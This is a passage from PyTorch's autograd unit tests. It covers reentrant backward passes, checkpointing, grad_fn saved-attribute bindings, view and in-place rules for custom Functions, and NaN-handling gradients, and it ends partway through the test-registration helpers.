counter it shares with `xz` self.assertTrue(x._version == xz._version) # In-place op on `xz` also updates version of `x`, # because they share the version counter xz.add_(1) self.assertTrue(x._version == xz._version) def test_set_data_tensorimpl_type(self): # Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl # of type `SparseTensorImpl`. x = torch.randn(1, 2) x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1])) with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'): x.data = x_s def test_set_data_preserve_pyobj(self): a = torch.randn(1, 2) b = torch.randn(1, 2) b_id_saved = id(b) b.data = a self.assertTrue(b_id_saved == id(b)) @unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows") def test_thread_shutdown(self): code = """import torch from torch.autograd import Function class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, grad): return grad for shape in [(1,), ()]: v = torch.ones(shape, requires_grad=True) MyFunction.apply(v).backward() """ s = TestCase.runWithPytorchAPIUsageStderr(code) self.assertRegex(s, "PYTORCH_API_USAGE torch.autograd.thread_shutdown") @unittest.skipIf(IS_MACOS, "Fails with SIGBUS on macOS; https://github.com/pytorch/pytorch/issues/25941") def test_deep_reentrant(self): class DeepReentrant(Function): @staticmethod def forward(ctx, x): with torch.enable_grad(): ctx.x = Variable(x.detach(), requires_grad=True) ctx.x = ctx.x - 1 return ctx.x.detach() @staticmethod def backward(ctx, x): if ctx.x < 0: return x with torch.enable_grad(): DeepReentrant.apply(ctx.x).sum().backward() return x # Test stack overflow escape mechanism v = torch.tensor(2000.0, requires_grad=True) # This will cause stack overflow if reentrant calls are handled # in the same thread recursively DeepReentrant.apply(v).sum().backward() # Test stack overflow escape mechanism multiple times # to ensure reusing workers in the pool works fine v2 = torch.tensor(200.0, requires_grad=True) DeepReentrant.apply(v2).sum().backward() def test_reentrant_priority(self): order = [] class MyFunction(Function): @staticmethod def forward(ctx, x): return x @staticmethod def backward(ctx, x): order.append("MyFunction") return x class Reentrant(Function): @staticmethod def forward(ctx, x): with torch.enable_grad(): ctx.x = Variable(x.detach(), requires_grad=True) ctx.x = ctx.x - 1 return ctx.x.detach() @staticmethod def backward(ctx, x): order.append("Reentrant") if ctx.x < 0: return x with torch.enable_grad(): Reentrant.apply(ctx.x).backward() return x a = MyFunction.apply(torch.tensor(6.0, requires_grad=True)) b = Reentrant.apply(torch.tensor(9.0, requires_grad=True)) v = a * b v.backward() # The tasks for the Reentrant and MyFunction backward() will be added # to the queue in the autograd engine at the same time. The backward # for Reentrant will be executed first, which will then add other # backward tasks to the queue. We want to ensure all the reentrant tasks # are prioritized over the MyFunction backward task regardless of their # sequence numbers self.assertEqual(len(order), 11) self.assertEqual(order.count("Reentrant"), 10) self.assertEqual(order[-1], "MyFunction") @slowTest def test_checkpointing(self): num_inp = 2000 nz_inp = 10 nz_out = 10 nz_bottleneck = 1000 # small proxy network for some complex reasoning we want to do per input module = nn.Sequential( nn.Linear(nz_inp, nz_bottleneck), nn.ReLU(), nn.Linear(nz_bottleneck, nz_inp) ) feat_combined = [] for r in range(num_inp): data_r = torch.empty(1, nz_inp) data_r.uniform_() data_r.requires_grad = True feat_r = checkpoint(module, data_r) feat_combined.append(feat_r) # compute mean as a proxy for some joint reasoning mean_combined = torch.stack(feat_combined).mean() mean_combined.backward() def test_checkpoint_valid_reset_on_error(self): a = torch.randn(2, 2, requires_grad=True) with self.assertRaisesRegex(Exception, "Checkpointing is not compatible with .grad()"): b = checkpoint(torch.exp, a).sum() torch.autograd.grad(b, (a,)) c = checkpoint(torch.exp, a).sum() c.backward() def _test_reentrant_with_callbacks(self, install_callbacks_in_depths): counter = {} counter["inner"] = 0 counter["outer"] = 0 def inc_inner_counter(): counter["inner"] += 1 def inc_outer_counter(): counter["outer"] += 1 class MyFunc(Function): @staticmethod def forward(ctx, input): return input @staticmethod @once_differentiable def backward(ctx, input): if 1 in install_callbacks_in_depths: # Add a callback to execute. Variable._execution_engine.queue_callback(inc_inner_counter) return input class MyReentrantFunc(Function): @staticmethod def forward(ctx, input): return input @staticmethod @once_differentiable def backward(ctx, input): if 0 in install_callbacks_in_depths: # Add a callback to execute. Variable._execution_engine.queue_callback(inc_outer_counter) # Reentrant backward call. tmp_inp = input.detach().requires_grad_() with torch.enable_grad(): tmp_out = (MyFunc.apply(tmp_inp)).sum() tmp_out.backward() return input t1 = torch.rand((3, 3), requires_grad=True) t2 = MyReentrantFunc.apply(t1) t3 = t2.sum() torch.autograd.backward([t3]) return counter def test_reentrant_with_callbacks_depth_0(self): # Verify callback is called only once. ret = self._test_reentrant_with_callbacks([0]) self.assertEqual(1, ret["outer"]) self.assertEqual(0, ret["inner"]) def test_reentrant_with_callbacks_depth_1(self): # Verify callback is called only once. ret = self._test_reentrant_with_callbacks([1]) self.assertEqual(0, ret["outer"]) self.assertEqual(1, ret["inner"]) def test_reentrant_with_callbacks_both_depths(self): # Verify callback is called twice. ret = self._test_reentrant_with_callbacks([0, 1]) self.assertEqual(1, ret["outer"]) self.assertEqual(1, ret["inner"]) def test_reentrant_with_leaf_variable_hook(self): handle = None param = torch.rand(10, requires_grad=True) def add_gradient_penalty_to_grad(grad): handle.remove() old_param_grad = grad param.grad = None # Add some sort of gradient penalty by directly updating the gradients with torch.enable_grad(): g = grad.detach().requires_grad_() new_param = param.detach().requires_grad_() out = ((g * 2) + new_param).sum() out.backward() res = g.grad + grad param.grad = old_param_grad return res handle = param.register_hook(add_gradient_penalty_to_grad) # Forward pass tmp = (param * param) loss = tmp.sum() # Compute the gradients loss.backward() def test_reentrant_with_non_leaf_variable_hook(self): handle = None param = torch.rand(10, requires_grad=True) def manual_increase_gradient(grad): handle.remove() # Add some sort of gradient penalty by directly updating the gradients with torch.enable_grad(): g = grad.detach().requires_grad_() out = ((g * 2) + 5).sum() out.backward() res = g.grad + grad return res # Forward pass tmp = (param * param) handle = tmp.register_hook(manual_increase_gradient) loss = tmp.sum() # Compute the gradients loss.backward() self.assertEqual(param.grad, 6 * param) def test_grad_fn_attr_bindings(self): # Check that the getter of each type returns what we want # See `gen_autograd_functions.py` for how the getters are generated # # This test is only meant to check if the codegen'd bindings work # Please help update this test if you update the names of any the fields we check! # a = torch.ones(1, requires_grad=True) b = torch.ones(1, requires_grad=True) out = torch.stack([a, b], dim=0) self.assertEqual(out.grad_fn._saved_tensors, (a, b)) # TensorList -> Tuple[Tensor] self.assertIsInstance(out.grad_fn._saved_tensors[0], torch.Tensor) self.assertEqual(out.grad_fn._saved_dim, 0) # int64_t -> int self.assertIsInstance(out.grad_fn._saved_dim, int) out.sum().backward() with self.assertRaisesRegex(RuntimeError, "after they have already been freed"): out.grad_fn._saved_tensors self.assertEqual(out.grad_fn._saved_dim, 0) a = torch.ones(2, 2, requires_grad=True) indices = torch.tensor([0, 1]) out = a[:, indices] self.assertEqual(out.grad_fn._saved_indices, (None, indices)) # c10::List<c10::optional<Tensor>> -> Tuple[Tensor?] self.assertIsInstance(out.grad_fn._saved_indices[1], torch.Tensor) self.assertEqual(out.grad_fn._saved_self_sizes, a.shape) # IntArrayRef -> Tuple[int] self.assertIsInstance(out.grad_fn._saved_self_sizes[0], int) a = torch.ones(1, 1, 2, requires_grad=True) out = torch.nn.functional.interpolate(a, 4, mode="linear") self.assertEqual(out.grad_fn._saved_output_size, (4,)) # c10::optional<IntArrayRef> -> int[]? self.assertIsInstance(out.grad_fn._saved_output_size[0], int) self.assertEqual(out.grad_fn._saved_align_corners, False) # bool -> bool self.assertIsInstance(out.grad_fn._saved_align_corners, bool) self.assertIsNone(out.grad_fn._saved_scale_factors) # c10::optional<ArrayRef<double>> -> float[]? out = torch.nn.functional.interpolate(a, scale_factor=0.5, mode="linear") self.assertIsNone(out.grad_fn._saved_output_size) self.assertEqual(out.grad_fn._saved_scale_factors, (0.5,)) self.assertIsInstance(out.grad_fn._saved_scale_factors[0], float) a = torch.ones(2, 2, requires_grad=True) out = torch.pdist(a, p=1) self.assertEqual(out.grad_fn._saved_p, 1.) # double -> float self.assertIsInstance(out.grad_fn._saved_p, float) a = torch.ones(1, 1, 2, requires_grad=True) out = torch.logit(a, 1.) self.assertEqual(out.grad_fn._saved_eps, 1.) # c10:optional<double> -> float? self.assertIsInstance(out.grad_fn._saved_eps, float) out = torch.logit(a) self.assertIsNone(out.grad_fn._saved_eps) if torch._C.has_lapack: a = torch.ones(1, 1, requires_grad=True) q, r = torch.linalg.qr(a, mode="reduced") self.assertEqual(q.grad_fn._saved_mode, "reduced") # std::string -> str a = torch.tensor([1.], requires_grad=True) out = torch.div(a, 2., rounding_mode="trunc") self.assertEqual(out.grad_fn._saved_rounding_mode, "trunc") # c10::optional<std::string> -> str? out = torch.div(a, 2., rounding_mode=None) self.assertIsNone(out.grad_fn._saved_rounding_mode) # c10::optional<std::string> -> str? x = torch.zeros(5, requires_grad=True) out = torch.threshold(x, threshold=(1 + 0j), value=(1 + 0j)) self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex double) -> complex cfloat = torch.tensor(1 + 0j, dtype=torch.complex64) out = torch.threshold(x, threshold=cfloat, value=(1 + 0j)) self.assertIsInstance(out.grad_fn._saved_threshold, complex) # Scalar(complex float) -> complex out = torch.threshold(x, threshold=1., value=1.) self.assertIsInstance(out.grad_fn._saved_threshold, float) # Scalar(floating point) -> float out = torch.threshold(x, threshold=1, value=1) self.assertIsInstance(out.grad_fn._saved_threshold, int) # Scalar(integral) -> int out = torch.threshold(x, threshold=False, value=False) self.assertIsInstance(out.grad_fn._saved_threshold, bool) # Scalar(bool) -> bool a = torch.ones(2, 2, requires_grad=True) out = a.as_strided((3,), (1,), 1) self.assertEqual(out.grad_fn._saved_storage_offset, 1) # c10:optional<int64_t> -> int? self.assertIsInstance(out.grad_fn._saved_storage_offset, int) out = a.as_strided((3,), (1,)) self.assertIsNone(out.grad_fn._saved_storage_offset) a = torch.ones(2, requires_grad=True) out = torch.tanh(a) self.assertEqual(out, out.grad_fn._saved_result) # saved variable when output a = torch.randn(3, 5, requires_grad=True) b = torch.tensor([1, 0, 4]) loss = nn.NLLLoss() out = loss(a, b) self.assertIsNone(out.grad_fn._saved_weight) loss = nn.NLLLoss(weight=torch.ones((5,))) out = loss(a, b) self.assertEqual(out.grad_fn._saved_weight, torch.ones((5,))) # c10:optional<Tensor> -> Tensor? out.sum().backward() with self.assertRaisesRegex(RuntimeError, "after they have already been freed"): out.grad_fn._saved_weight def test_autograd_views_codegen(self): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This test checks the behavior of two codegen functions (view_as and unbind) # with respect to view tracking and inplace operation on the output. def run_test(grad_mode, requires_grad, is_view, should_raise_tuple): def maybe_check_raise(fn, should_raise): self.assertTrue(should_raise is None or isinstance(should_raise, str)) if should_raise is not None: with self.assertRaisesRegex(RuntimeError, should_raise): fn() else: fn() inp = torch.rand(2, requires_grad=requires_grad).clone() with torch.set_grad_enabled(grad_mode): out = inp.view_as(inp) # Are they differentiable views? self.assertTrue(out._is_view() == is_view) # Are inplace allowed? maybe_check_raise(lambda: out.add_(1), should_raise_tuple[0]) inp = torch.rand(2, requires_grad=requires_grad).clone() with torch.set_grad_enabled(grad_mode): out = inp.unbind() # Are they differentiable views? self.assertTrue(out[0]._is_view() == is_view) self.assertTrue(out[1]._is_view() == is_view) # Are inplace allowed? maybe_check_raise(lambda: out[0].add_(1), should_raise_tuple[1]) maybe_check_raise(lambda: out[1].add_(1), should_raise_tuple[2]) # should_raise contains None if it should not raise # should_raise contains a string of the error if it should raise # The 3 elements are for view_as, first output of unbind and second output of unbind run_test(grad_mode=True, requires_grad=False, is_view=True, should_raise_tuple=(None, None, None)) inp_change_err = "Output {} of UnbindBackward is a view and is being modified inplace." run_test(grad_mode=True, requires_grad=True, is_view=True, should_raise_tuple=(None, inp_change_err.format("0"), inp_change_err.format("1"))) leaf_grad_err = "A view was created in no_grad mode and is being modified inplace" run_test(grad_mode=False, requires_grad=True, is_view=True, should_raise_tuple=(leaf_grad_err, leaf_grad_err, leaf_grad_err)) run_test(grad_mode=False, requires_grad=False, is_view=True, should_raise_tuple=(None, None, None)) def test_inplace_not_requires_grad(self): class MyFn(torch.autograd.Function): @staticmethod def forward(ctx, inp): return inp.view_as(inp) @staticmethod def backward(ctx, grad): return grad # Original Tensor does not require grad a = torch.rand(1, 2) # Tensor being written does require grad b = torch.rand(1, requires_grad=True) # Take an invalid view on 'a' that should raise an error (warns during deprecation) view_a = MyFn.apply(a) with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"): view_a += b # Extra test for copy_ that is a manual implementation and could be easily # forgotten when the codegen is updated (warns during deprecation) a = torch.rand(1, 2) b = torch.rand(1, requires_grad=True) view_a = MyFn.apply(a) with self.assertRaisesRegex(RuntimeError, "This view was created inside a custom Function"): view_a.copy_(b) # Functions that should throw must properly throw a = torch.rand(1, 2) b = torch.rand(1, requires_grad=True) view_a = a.unbind()[0] with self.assertRaisesRegex(RuntimeError, "This view is the output of a function that returns " "multiple views."): view_a.copy_(b) # Sanity check that views that should work still work a = torch.rand(1, 2) b = torch.rand(1, requires_grad=True) a.select(1, 0).copy_(b) def _do_test_autograd_simple_views_python(self, dtype): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This checks the autograd.Function behavior when we return one or multiple outputs # while one of these is an input, a view of an input or of a temporary tensor. # This indicator is used to track how many times the backward function was called bw_called = [0] # This indicator is used to check if the argument `ga` contains non-zero values ga_nz = [False] class IdOneOutput(Function): @staticmethod def forward(ctx, a, b, make_view): if make_view: a = a.narrow(0, 0, 2) else: a = a.clone() return a @staticmethod def backward(ctx, ga): bw_called[0] += 1 return ga, None, None class IdTwoOutput(Function): @staticmethod def forward(ctx, a, b, make_view): if make_view: a = a.narrow(0, 0, 2) else: a = a.clone() return a, a + b @staticmethod def backward(ctx, ga, gab): bw_called[0] += 1 if ga.eq(0).all(): ga_nz[0] = False else: ga_nz[0] = True return ga + gab, gab, None class ViewOfTemp(Function): @staticmethod def forward(ctx, a, make_view): ctx.save_for_backward(a) if make_view: a = a.narrow(0, 0, 2) else: a = a.clone() b = a.clone() return b.select(0, 0) @staticmethod def backward(ctx, grad): bw_called[0] += 1 a, = ctx.saved_tensors res = torch.zeros_like(a) res.select(0, 0).copy_(grad) return res, None fn_id_to_inplace_view_err_msg = { "one_output": ("Output 0 of IdOneOutputBackward is a view and is being " "modified inplace. This view was created inside a custom Function"), "two_output": ("Output 0 of IdTwoOutputBackward is a view and is being modified inplace." " This view is the output of a function that returns multiple views."), "view_of_temp": ("Output 0 of ViewOfTempBackward is a view and is being " "modified inplace. This view was created inside a custom Function") } for fn_id in ["one_output", "two_output", "view_of_temp"]: for inplace in [True, False]: for make_view in [True, False]: # Used for special casing the tests below output_is_a_view = (make_view or fn_id == "view_of_temp") def fn(a, b): # never modify a, b inplace for gracheck a = a.clone() b = b.clone() if fn_id == "two_output": tmp1, tmp2 = IdTwoOutput.apply(a, b, make_view) if inplace: tmp1 += 3 tmp2 += 3 else: tmp1 = tmp1 + 3 tmp2 = tmp2 + 3 tmp = tmp1 * tmp2 else: if fn_id == "one_output": tmp = IdOneOutput.apply(a, b, make_view) else: tmp = ViewOfTemp.apply(a + b, make_view) if inplace: tmp += 3 else: tmp = tmp + 3 return tmp.sum() a = torch.ones(2, dtype=dtype, requires_grad=True) b = torch.ones(2, dtype=dtype, requires_grad=True) err_msg = fn_id_to_inplace_view_err_msg[fn_id] if not inplace or not output_is_a_view: gradcheck(fn, (a, b), check_batched_grad=False) # Was the custom backward called properly bw_called[0] = 0 ga_nz[0] = True # For the case where the backward is called if inplace and output_is_a_view: with self.assertRaisesRegex(RuntimeError, err_msg): fn(a, b) else: fn(a, b).backward() expected_called = 1 expected_ga_nz = True if output_is_a_view and inplace: expected_called = 0 self.assertTrue(bw_called[0] == expected_called) self.assertTrue(ga_nz[0] == expected_ga_nz) def test_autograd_simple_views_python(self): self._do_test_autograd_simple_views_python(torch.double) self._do_test_autograd_simple_views_python(torch.cdouble) def test_autograd_complex_views_python(self): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This checks that multiples views in the forward are properly traced and how they # behave with respect to inplace operations. # This indicator is used to track how many times the backward function was called bw_called = [0] class ComplexView(Function): @staticmethod def forward(ctx, a, idx): res = a.narrow(0, idx, 1) res = a.select(0, idx) ctx.save_for_backward(a) ctx.idx = idx return res @staticmethod def backward(ctx, grad): bw_called[0] += 1 a, = ctx.saved_tensors res = torch.zeros_like(a) res.select(0, ctx.idx).copy_(grad) return res, None a = torch.ones(2, requires_grad=True) idx = 1 bw_called[0] = 0 out = ComplexView.apply(a.clone(), idx) out.sum().backward() self.assertTrue(bw_called[0] == 1) out = ComplexView.apply(a.clone(), idx) with self.assertRaisesRegex(RuntimeError, "Output 0 of ComplexViewBackward is a view and is being modified inplace"): out += 1 def test_autograd_inplace_views_python(self): # This is not necessarily the absolute correct behavior, but this is the current # one. This test is here to make sure that any change to this behavior is detected # and not silent. The TODOs below mark the places with unexpected behavior. # Note that any change in these test will be BC-breaking and should be done carefully. # This test checks custom autograd.Function that perform inplace operations bw_called = [0] # I) Single output class MyAdder(Function): @staticmethod def forward(ctx, a, b): a.add_(b) ctx.mark_dirty(a) return a @staticmethod def backward(ctx, grad): bw_called[0] += 1 return grad, grad a = torch.ones(2, requires_grad=True) b = torch.ones(2, requires_grad=True) # No extra inplace c = MyAdder.apply(a.clone(), b) c.sum().backward() self.assertTrue(bw_called[0] == 1) # With extra inplace on the output bw_called[0] = 0 c = MyAdder.apply(a.clone(), b) c += 2 c.sum().backward() self.assertTrue(bw_called[0] == 1) # The input is a view bw_called[0] = 0 c = MyAdder.apply(a.clone().view_as(a), b) c.sum().backward() self.assertTrue(bw_called[0] == 1) # Should not give non-inputs to mark_dirty class MyAdderBad(Function): @staticmethod def forward(ctx, a, b): c = 3 * a c.add_(b) ctx.mark_dirty(c) return c @staticmethod def backward(ctx, grad): bw_called[0] += 1 grad = 3 * grad return grad, grad a = torch.ones(2, requires_grad=True) b = torch.ones(2, requires_grad=True) with warnings.catch_warnings(record=True) as w: MyAdderBad.apply(a.clone(), b) self.assertEqual(len(w), 1) # II) Multiple outputs class MyBadAdder(Function): @staticmethod def forward(ctx, a, b): a.add_(b) ctx.mark_dirty(a) return a, a + b @staticmethod def backward(ctx, ga, gab): bw_called[0] += 1 return ga + gab, ga + gab # No extra inplace bw_called[0] = 0 c, d = MyBadAdder.apply(a.clone(), b) (c * d).sum().backward() self.assertTrue(bw_called[0] == 1) # With extra inplace on the output bw_called[0] = 0 c, d = MyBadAdder.apply(a.clone(), b) c += 2 (c * d).sum().backward() self.assertTrue(bw_called[0] == 1) # The input is a view inplace_on_view_err = "your Function modifies inplace an input that is a view of another Tensor" with self.assertRaisesRegex(RuntimeError, inplace_on_view_err): c, d = MyBadAdder.apply(a.clone().view_as(a), b) # III) Inplace + other op class MyOutPlaceAdder(Function): @staticmethod def forward(ctx, a, b): a.add_(b) ctx.mark_dirty(a) return a.clone(), a + b @staticmethod def backward(ctx, ga, gab): bw_called[0] += 1 return ga + gab, ga + 2 * gab # We don't reuse the input def fn(a, b): orig_a = a.clone().view_as(a) c, d = MyOutPlaceAdder.apply(orig_a, b) return (c * d).sum() bad_mark_dirty_err = "Some elements marked as dirty during the forward method were not returned as output." with self.assertRaisesRegex(RuntimeError, bad_mark_dirty_err): fn(a, b) def test_named_tensor_for_complex_views(self): names = ["batch", "height", "width", "complex"] z = torch.ones((5, 12, 14, 2), requires_grad=True) z_named = z.refine_names(*names) z_complex = torch.view_as_complex(z_named.rename(None)).refine_names(*names[:-1]) z_complex.sum().backward() self.assertEqual(z.grad, torch.view_as_real(torch.ones_like(z_complex).rename(None))) def test_custom_function_return_view_in_nograd(self): class Alias(Function): @staticmethod def forward(ctx, x): return x[:] @staticmethod def backward(ctx, gx): return gx inp = torch.rand(2, requires_grad=True) with torch.no_grad(): output = Alias.apply(inp) with torch.no_grad(): expected_output = inp[:] # Calling the custom function should operate as if we called an equivalent op self.assertEqual(output.requires_grad, expected_output.requires_grad) # Check that in-place modification on view throws leaf_grad_err = "A view was created in no_grad mode and is being modified inplace" with self.assertRaisesRegex(RuntimeError, leaf_grad_err): output.zero_() def test_grad_mode_restored_reentrant(self): class MyFunction(Function): @staticmethod def forward(ctx, inp): return inp.clone() @staticmethod def backward(ctx, go): original = torch._C.is_grad_enabled() with torch.enable_grad(): self.assertTrue(torch._C.is_grad_enabled()) foo = torch.rand(go.size(), requires_grad=True) grad, = torch.autograd.grad( foo ** 3, foo, grad_outputs=go ) self.assertTrue(torch._C.is_grad_enabled()) self.assertTrue(torch._C.is_grad_enabled() == original) return grad inp = torch.rand(3, requires_grad=True) # Case where original==False MyFunction.apply(inp).sum().backward() # Case where original==True MyFunction.apply(inp).sum().backward(create_graph=True) def test_power_function(self): a = torch.tensor([0., 0., 0.]) b = torch.tensor([-1., 0., 1.], requires_grad=True) c = torch.sum(a**b) c.backward() self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.])) s = 0 b = torch.tensor([-1., 0., 1.], requires_grad=True) c = torch.sum(s**b) c.backward() self.assertEqual(b.grad, torch.tensor([-inf, 0., 0.])) def test_nansum_with_nans(self): a = torch.randn(2, 2, 2, 2, dtype=torch.double) with torch.no_grad(): a[a < 0.2] = float('nan') a.requires_grad = True # No args gradcheck(lambda x: x.nansum(), a) gradgradcheck(lambda x: x.nansum(), a) # Single dim gradcheck(lambda x: x.nansum((0)), a) gradgradcheck(lambda x: x.nansum((0)), a) # Multi dim gradcheck(lambda x: x.nansum((0, 2)), a) gradgradcheck(lambda x: x.nansum((0, 2)), a) gradcheck(lambda x: x.nansum((0, -1)), a) gradgradcheck(lambda x: x.nansum((0, -1)), a) # With keep-dim gradcheck(lambda x: x.nansum((0, -1), True), a) gradgradcheck(lambda x: x.nansum((0, -1), True), a) def test_nansum_dtype(self): inp = torch.randn(2, 2, 2, 2) with torch.no_grad(): inp[inp < 0.2] = float('nan') def test(inp, inp_dtype, out_dtype): with torch.no_grad(): a = inp.to(inp_dtype) a.requires_grad = True b = torch.sum(a, dtype=out_dtype) b.backward() self.assertEqual(a.dtype, a.grad.dtype) test(inp, torch.float, torch.double) test(inp, torch.double, torch.float) def test_nan_to_num(self): a = torch.randn(3, 3, 3, 3, dtype=torch.double) with torch.no_grad(): a[torch.rand_like(a) < 0.2] = float('nan') a[torch.rand_like(a) < 0.2] = float('inf') a[torch.rand_like(a) < 0.2] = -float('inf') a.requires_grad = True gradcheck(lambda x: x.nan_to_num(), a) gradgradcheck(lambda x: x.nan_to_num(), a) gradcheck(lambda x: x.nan_to_num(nan=1.2), a) gradgradcheck(lambda x: x.nan_to_num(nan=1.2), a) gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a) gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0), a) gradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a) gradgradcheck(lambda x: x.nan_to_num(nan=1.2, posinf=2.0, neginf=-2.0), a) gradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a) gradgradcheck(lambda x: x.nan_to_num(posinf=2.0, neginf=-2.0), a) gradcheck(lambda x: x.nan_to_num(neginf=-2.0), a) gradgradcheck(lambda x: x.nan_to_num(neginf=-2.0), a) def test_custom_function_error(self): class BadFw(Function): @staticmethod def backward(ctx, foo): return foo class BadBw(Function): @staticmethod def forward(ctx, foo): return foo.clone() inp = torch.rand(1, requires_grad=True) with self.assertRaisesRegex(NotImplementedError, "must implement the forward"): BadFw.apply(inp) with self.assertRaisesRegex(RuntimeError, "must implement the backward"): BadBw.apply(inp).sum().backward() def test_custom_function_local_inplace(self): class MyFn(torch.autograd.Function): @staticmethod def forward(ctx, inp, inplace): view = inp.clone()[:3] if inplace: view += 2 return view @staticmethod def backward(ctx, grad): return grad, None base = torch.rand(10, requires_grad=True) foo = MyFn.apply(base, False) self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward") foo = MyFn.apply(base, True) self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward") def test_integer_outputs(self): inp = torch.rand(4, requires_grad=True) out = inp.argmax() self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) out = inp.argmin() self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) out = inp.argsort() self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) val = torch.rand((), requires_grad=True) out = torch.searchsorted(inp, val) self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) bins = torch.linspace(0, 1.0, steps=100, requires_grad=True) vals = torch.rand(5, 5, requires_grad=True) out = torch.bucketize(vals, bins) self.assertFalse(out.dtype.is_floating_point) self.assertFalse(out.requires_grad) val = torch.empty(5).requires_grad_() out = val.count_nonzero() self.assertFalse(out.requires_grad) def assert_only_first_requires_grad(res): if not isinstance(res, tuple): res = (res,) self.assertTrue(res[0].requires_grad) for out in res[1:]: if out is not None: self.assertFalse(out.requires_grad) for sort in [True, False]: for return_inverse in [True, False]: for return_counts in [True, False]: res = torch.unique(inp, sorted=sort, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) res = torch.unique(inp, sorted=sort, return_inverse=return_inverse, return_counts=return_counts, dim=0) assert_only_first_requires_grad(res) res = torch.unique_consecutive(inp, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) res = torch.unique_consecutive(inp, return_inverse=return_inverse, return_counts=return_counts, dim=0) assert_only_first_requires_grad(res) # Here we test the internal functions to make sure all of them are # covered on top of the public API res = torch._unique(inp, sorted=sort, return_inverse=return_inverse) assert_only_first_requires_grad(res) # This looks public but is actually manually deleted from the # torch namespace in torch/functional.py res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) # We don't test `unique_dim_consecutive` here. # It looks public but the python binding is actually manually disabled in # tools/autograd/gen_python_functions.py res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse, return_counts=return_counts) assert_only_first_requires_grad(res) def index_perm_variable(shape, max_indices): if not isinstance(shape, tuple): shape = (shape,) index = torch.randperm(max_indices).narrow(0, 0, reduce(mul, shape)).view(shape) return index def bernoulli_scalar(): return torch.tensor(0, dtype=torch.uint8).bernoulli_() def gradgradcheck_method_precision_override(test_name): # these are just empirical observations, we should improve gradgradcheck_precision_override = { 'test_norm': {'atol': 2e-2, 'rtol': 1e-2}, 'test_norm_1_5': {'atol': 1.5e-2, 'rtol': 1e-2}, 'test_norm_3': {'atol': 5e-2, 'rtol': 1e-2}, 'test_dist': {'atol': 5e-2, 'rtol': 1e-2}, 'test_dist_4': {'atol': 8e-2, 'rtol': 1e-2}, } non_broadcasted_test_name = test_name.split("_broadcast")[0] override = gradgradcheck_precision_override.get(non_broadcasted_test_name) if override: if 'broadcast_lhs' in test_name or 'broadcast_rhs' in test_name: # errors accumulated across 1 dimension override = {'atol': override['atol'] * S, 'rtol': override['atol'] * S} elif 'broadcast_all' in test_name: # errors accumulated across multiple dimensions override = {'atol': override['atol'] * S * S, 'rtol': override['atol'] * S * S} return override def run_grad_and_gradgrad_checks(test_case, name, test_name, apply_method, output_variable, input_variables, run_gradgradcheck=True, check_batched_grad=True): test_case.assertTrue(gradcheck(apply_method, input_variables, eps=1e-6, atol=PRECISION, check_batched_grad=check_batched_grad)) if name in EXCLUDE_GRADGRADCHECK or test_name in EXCLUDE_GRADGRADCHECK_BY_TEST_NAME: return gradgradcheck_precision_override = gradgradcheck_method_precision_override(test_name) if gradgradcheck_precision_override is not None: atol = gradgradcheck_precision_override['atol'] rtol = gradgradcheck_precision_override['rtol'] test_case.assertTrue(gradgradcheck(apply_method, input_variables, None, atol=atol, rtol=rtol, gen_non_contig_grad_outputs=True, check_batched_grad=check_batched_grad)) else: test_case.assertTrue(gradgradcheck(apply_method, input_variables, gen_non_contig_grad_outputs=True, check_batched_grad=check_batched_grad)) def run_functional_checks(test_case, test_name, name, apply_fn, run_grad_checks, f_args_variable, f_args_tensor): output_variable = apply_fn(*f_args_variable) if run_grad_checks: run_grad_and_gradgrad_checks(test_case, name, test_name, apply_fn, output_variable, f_args_variable) self_variable = f_args_variable[0] if isinstance(output_variable, torch.Tensor) and output_variable.requires_grad and self_variable is not None: output_variable.backward(randn_like(output_variable)) test_case.assertEqualTypeString(self_variable, self_variable.grad) test_case.assertEqual(self_variable.size(), self_variable.grad.size()) # this list corresponds to ops which have separate tests defined for complex dtypes in # common_methods_invocations.py # test for these ops with 'complex' in variant should only run for complex and # the tests for these ops which do not have 'complex' in variant should not run for complex # and only run for floating point separate_complex_tests = ['div', '__rdiv__', 'sub'] # allow list for complex complex_list = ['t', 'view', 'reshape', 'reshape_as', 'view_as', 'roll', 'clone', 'expand', 'rot90', 'transpose', 'permute', 'squeeze', 'unsqueeze', 'resize', 'resize_as', 'tril', 'triu', 'chunk', 'split', 'split_with_sizes', 'zero_', '__radd__', 'mul', '__rmul__', 'diagonal', 'fill_', 'sub', 'narrow', 'swapaxes', 'swapdims', 'tensor_split'] + separate_complex_tests # deny list for batched grad computation EXCLUDE_BATCHED_GRAD_TESTS = set([ 'test_to_sparse', ]) def add_test( name, self_size, args, variant_name='', check_ad=(), # only used in 